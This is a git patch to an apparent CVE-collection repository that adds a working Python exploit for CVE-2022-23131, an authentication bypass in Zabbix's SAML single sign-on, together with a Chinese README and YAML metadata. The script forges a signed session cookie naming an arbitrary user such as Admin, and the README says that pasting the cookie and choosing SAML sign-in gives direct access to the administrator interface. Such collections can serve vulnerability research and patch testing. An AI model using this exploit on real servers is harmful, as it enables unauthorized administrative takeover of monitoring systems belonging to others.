From a93ee26d6362b8908e59c0feee425428330258bc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=A8=8A=E6=98=87=E8=BE=BE?= <7878151+fan_shengda@user.noreply.gitee.com> Date: Tue, 4 Apr 2023 03:46:22 +0000 Subject: [PATCH] =?UTF-8?q?=E7=AC=AC=E5=9B=9B=E6=AC=A1=E6=8F=90=E4=BA=A4CV?= =?UTF-8?q?E-2022-23131,=E4=BF=AE=E6=94=B9=E4=BA=86yaml=E6=96=87=E4=BB=B6?= =?UTF-8?q?=E4=B8=AD=20=20scope-of-influence:=20=E7=9A=84=E7=BC=A9?= =?UTF-8?q?=E8=BF=9B=E9=94=99=E8=AF=AF=E3=80=82?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 樊昇达 <7878151+fan_shengda@user.noreply.gitee.com> --- .../2022/CVE-2022-23131/CVE-2022-23131.py | 37 +++++++++++++++++++ cve/zabbix/2022/CVE-2022-23131/README.md | 4 ++ cve/zabbix/2022/yaml/CVE-2022-23131.yaml | 20 ++++++++++ other_list.yaml | 2 + 4 files changed, 63 insertions(+) create mode 100644 cve/zabbix/2022/CVE-2022-23131/CVE-2022-23131.py create mode 100644 cve/zabbix/2022/CVE-2022-23131/README.md create mode 100644 cve/zabbix/2022/yaml/CVE-2022-23131.yaml diff --git a/cve/zabbix/2022/CVE-2022-23131/CVE-2022-23131.py b/cve/zabbix/2022/CVE-2022-23131/CVE-2022-23131.py new file mode 100644 index 00000000..881c7d68 --- /dev/null +++ b/cve/zabbix/2022/CVE-2022-23131/CVE-2022-23131.py @@ -0,0 +1,37 @@ +import requests +import re +import urllib.parse +import base64 +import json +import sys + +def exp(target, username): + resp = requests.get(url=target, verify=False) + cookie = resp.headers.get("Set-Cookie") + + zbx_session = re.findall(r"zbx_session=(.*?); ", cookie) + + url_decode_data = urllib.parse.unquote(zbx_session[0], encoding='utf-8') + base64_decode_data = base64.b64decode(url_decode_data) + + decode_to_str = str(base64_decode_data, encoding='utf-8') + + to_json = json.loads(decode_to_str) + + tmp_ojb = dict(saml_data=dict(username_attribute=username), sessionid=to_json["sessionid"], sign=to_json["sign"]) + + payloadJson = json.dumps(tmp_ojb) + print("decode_payload:", payloadJson) + + payload = urllib.parse.quote(base64.b64encode(payloadJson.encode())) + print("zbx_signed_session:", payload) + + +if __name__ == "__main__": + if len(sys.argv) != 3: + print("argv error") + exit(0) + target = sys.argv[1] + username = sys.argv[2] + + exp(target, username) \ No newline at end of file diff --git a/cve/zabbix/2022/CVE-2022-23131/README.md b/cve/zabbix/2022/CVE-2022-23131/README.md new file mode 100644 index 00000000..bd13b10a --- /dev/null +++ b/cve/zabbix/2022/CVE-2022-23131/README.md @@ -0,0 +1,4 @@ +CVE-2022-23131 +使用方式:python3 CVE-2022-23131.py target Admin +其中,target为目标地址 Admin固定为管理员用户名。将生成的zbx_signed_session替换到当前目标的cookie中 点击登陆页面的sign in with Single Sign-On (SAML)方式登陆,即可直接进入管理界面 + diff --git a/cve/zabbix/2022/yaml/CVE-2022-23131.yaml b/cve/zabbix/2022/yaml/CVE-2022-23131.yaml new file mode 100644 index 00000000..0eab256c --- /dev/null +++ b/cve/zabbix/2022/yaml/CVE-2022-23131.yaml @@ -0,0 +1,20 @@ +id: CVE-2022-23131 +source: + https://github.com/L0ading-x/cve-2022-23131 +info: + name: Zabbix 是由 Alexei Vladishev 开发的一种网络监视、管理系统,基于 Server-Client 架构。可用于监视各种网络服务、服务器和网络机器等状态。 + severity: critical + description: 在启用 SAML SSO 身份验证(非默认)的情况下,恶意行为者可以修改会话数据,因为存储在会话中的用户登录未经过验证。恶意的未经身份验证的参与者可能会利用此问题来提升权限并获得对 Zabbix Frontend 的管理员访问权限。要执行攻击,需要启用 SAML 身份验证,并且攻击者必须知道 Zabbix 用户的用户名(或使用默认情况下禁用的来宾帐户)。 + scope-of-influence: + Zabbix 5.4.0 – 5.4.8; Zabbix 6.0.0alpha1 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-23131 + - https://www.secpulse.com/archives/179601.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-23131 + cwe-id: CWE-290 + cnvd-id: None + kve-id: None + tags: 前端认证绕过漏洞 \ No newline at end of file diff --git a/other_list.yaml b/other_list.yaml index 8f7ee835..363ec2fb 100644 --- a/other_list.yaml +++ b/other_list.yaml @@ -41,4 +41,6 @@ cve: - CVE-2023-28432 Node.js: - CVE-2021-21315 + zabbix: + - CVE-2022-23131 cnvd: -- Gitee